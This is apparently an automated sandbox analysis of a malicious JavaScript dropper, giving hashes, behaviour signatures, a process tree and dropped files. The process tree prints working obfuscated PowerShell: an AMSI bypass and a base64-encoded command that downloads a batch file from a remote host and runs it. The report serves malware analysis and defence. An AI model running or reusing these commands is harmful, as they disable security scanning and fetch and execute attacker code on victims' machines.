Analysis

  • max time kernel: 149s
  • max time network: 153s
  • platform: windows10-2004_x64
  • resource: win10v2004-20250129-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20250129-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 07/02/2025, 05:14

General

  • Target: cd123c288f623878218be31125000441bb8c5447375af67bc3c1d27d16eb5f8c.js
  • Size: 10KB
  • MD5: 14b3fe437467996209704e6ebaac0f0a
  • SHA1: 76352226e921e8cf57746c551735cd913c3e45c8
  • SHA256: cd123c288f623878218be31125000441bb8c5447375af67bc3c1d27d16eb5f8c
  • SHA512: a4bbc226b4e35afa37702d852325a83103570b01ed76b151ab05a1f96ff855fa12579836dea116e5a9e64bbec63606773ac49ac3b2147a2cd001f46e4d8f93de
  • SSDEEP: 192:mpu81rs1WEVHAq/azhC8bw33tDMRI7xxYG8N0vJod67czsGSVXi:mU81rW1lTyzM33du0viCczSXi

Malware Config

Signatures

  • Checks computer location settings (2 TTPs, 2 IoCs)
    Looks up country code configured in the registry, likely geofence.
  • Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
    Using powershell.exe command.
  • Obfuscated Files or Information: Command Obfuscation (1 TTPs)
    Adversaries may obfuscate content during command execution to impede detection.
  • Command and Scripting Interpreter: JavaScript (1 TTPs)
  • Enumerates physical storage devices (1 TTPs)
    Attempts to interact with connected storage/optical drive(s).
  • Modifies registry class (1 IoCs)
  • Suspicious behavior: EnumeratesProcesses (4 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (6 IoCs)

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\cd123c288f623878218be31125000441bb8c5447375af67bc3c1d27d16eb5f8c.js
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2140
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\apk.js"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -C $FEIfwuioehfaiwyYOETWTRuwye = 'a'+'ms'+'iI'+'ni'+'tF'+'a'; $EF8034uowieypowiue = 'il'+'ed'; $Ceoiuwjoeuyfw = 'Sy'+'st'+'em.Ma'+'na'+'gem'+'ent.'+'Aut'+'omat'+'io'+'n.A'+'ms'+'iUt'+'ils'; $DFiowjhOHWOHEOUF = $null; sleep 1; $text = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('W1JlZl0uQXNzZW1ibHkuR2V0VHlwZSgkQ2VvaXV3am9ldXlmdykuR2V0RmllbGQoJEZFSWZ3dWlvZWhmYWl3eVlPRVRXVFJ1d3llICsgJEVGODAzNHVvd2lleXBvd2l1ZSwiTm9uUCIgKyAidWIiICsgImxpYyxTdCIgKyAiYXRpYyIpLlNldFZhbHVlKCRERmlvd2poT0hXT0hFT1VGLCR0cnVlKQ==')); iex $text; sleep 1;$BBQ = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovL3NvdXRobGFuZGVyLnJ1L2RrbGZoZ2pkZmhnamQ3OGtoZGdmamdoL2FrdC5iYXQiIC1PdXRGaWxlICIkZW52OlRFTVBcYWt0LmJhdCI7IEludm9rZS1FeHByZXNzaW9uICIkZW52OlRFTVBcYWt0LmJhdCI7')); $CCQ = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($BBQ)); Powershell -E $CCQ
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2624
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwBzAG8AdQB0AGgAbABhAG4AZABlAHIALgByAHUALwBkAGsAbABmAGgAZwBqAGQAZgBoAGcAagBkADcAOABrAGgAZABnAGYAagBnAGgALwBhAGsAdAAuAGIAYQB0ACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYQBrAHQALgBiAGEAdAAiADsAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYQBrAHQALgBiAGEAdAAiADsA
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:968

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 2KB
    MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
    SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
    SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
    SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: ae343a0c544713797d1582baed41cd6c
    SHA1: 170efb0fbebe36a6f605c6cfd664525f1158a58e
    SHA256: dbc33d6f061613aaf9ec0a3472b37ec709ac168cde70c7b48c5807765f3ed292
    SHA512: 68afed158e066e67d6526627ceda320e1702779b95b8fe597ef573c1be7bcef0dc19f0e6fc17e8103c16fb0aa77d83e06e5f64435100d60193e3ee72e9bbc8b5

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_js21u5gf.m0l.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\apk.js
    Filesize: 3KB
    MD5: a56dc65b1a1a28d7bedae072e521150d
    SHA1: 975296e54e8f05b793187048152903ec85d21868
    SHA256: 2da128f83fbae17fd5eadb31bc36be585d8b7c5982355288b58c4d8a4554254e
    SHA512: 6e04f9a0f56990e2d534a1f9bf9ececdad03182160d6236c570181d3848cd6ea838bbeeb12a53d29ba597c8634c21fdd2614b4c10f7412afd40d89bef3f155ec

  • memory/2624-9-0x000001B5FEB30000-0x000001B5FEB52000-memory.dmp
    Filesize: 136KB